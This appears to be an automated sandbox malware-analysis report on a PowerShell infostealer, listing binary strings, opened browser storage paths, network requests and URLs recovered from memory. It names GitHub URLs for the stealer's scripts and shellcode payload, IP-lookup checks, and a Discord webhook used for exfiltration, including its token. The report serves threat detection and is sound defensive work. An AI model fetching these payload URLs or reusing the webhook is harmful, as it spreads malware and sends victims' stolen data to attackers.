            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000030.00000002.2331375157.000000C0002C4000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbV_ source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ement.Automationp.pdby source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbDD2-7850-423A-B1D8-7882CE1A6D15.log source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdb source: powershell.exe, 00000028.00000002.2916812846.0000017E804BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: powershell.exe, 00000030.00000002.2331375157.000000C000136000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdbhP source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: grule230174v0.xmlrule230200v0.xmlrule700000v2.xmlrule700001v2.xmlrule700050v1.xmlrule700051v1.xmlrule700100v1.xmlrule700101v1.xmlrule700150v1.xmlrule700151v1.xmlrule700200v1.xmlrule700201v1.xmlrule700250v1.xmlrule700251v1.xmlrule700300v1.xmlrule700301v1.xmlrule700350v1.xmlrule700351v1.xmlrule700400v2.xmlrule700401v2.xmlrule700450v1.xmlrule700451v1.xmlrule700500v1.xmlrule700501v1.xmlrule700550v1.xmlrule700551v1.xmlrule700600v1.xmlrule700601v1.xmlrule700650v1.xmlrule700651v1.xmlrule700700v1.xmlrule700701v1.xmlC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\TempC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscom
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000030.00000002.2331375157.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbpX source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000030.00000002.2331375157.000000C000116000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Net.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.pdb~ source: powershell.exe, 00000028.00000002.2916812846.0000017E804A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdbtract source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pingme.txtntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdboAqN:: source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: p.pdb source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbgAyN; source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ings source: powershell.exe, 00000030.00000002.2633346989.000002A872B26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbmt"i source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdbWF source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbdownload.error source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WINLOA~1.PDB3( source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdb source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def

            Networking

            Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1 Host: github.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1 Host: github.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 208.95.112.1
            Source: Joe Sandbox View | IP Address: 140.82.121.3
            Source: Joe Sandbox View | IP Address: 185.199.110.133
            Source: Joe Sandbox View | ASN Name: TUT-ASUS
            Source: Joe Sandbox View | ASN Name: GITHUBUS
            Source: Joe Sandbox View | ASN Name: FASTLYUS
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | DNS query: name: ip-api.com
            Source: global traffic | HTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.cloudflare.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.cloudflare.com
            Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com
            Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ip-api.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ip-api.com
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global traffic | DNS traffic detected: DNS query: www.cloudflare.com
            Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: ip-api.com
            Source: global traffic | DNS traffic detected: DNS query: github.com
            Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
            Source: powershell.exe, 00000028.00000002.2916812846.0000017E8045A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mh
            Source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBF9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE02764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000024.00000002.1956228597.0000029E526AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.cv
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0272A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0273D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC470EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.X
            Source: powershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx
            Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvx
            Source: powershell.exe, 00000030.00000002.2636336709.000002A872D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.cg
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE866A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EEA035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE97DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE8E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
            Source: powershell.exe, 00000030.00000002.2354975685.000002A85A580000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A9A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CC220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85AAF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheWover
            Source: powershell.exe, 00000030.00000002.2354204002.000002A858DB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1
            Source: powershell.exe, 0000002C.00000002.2100725567.00000201C8F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47B46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
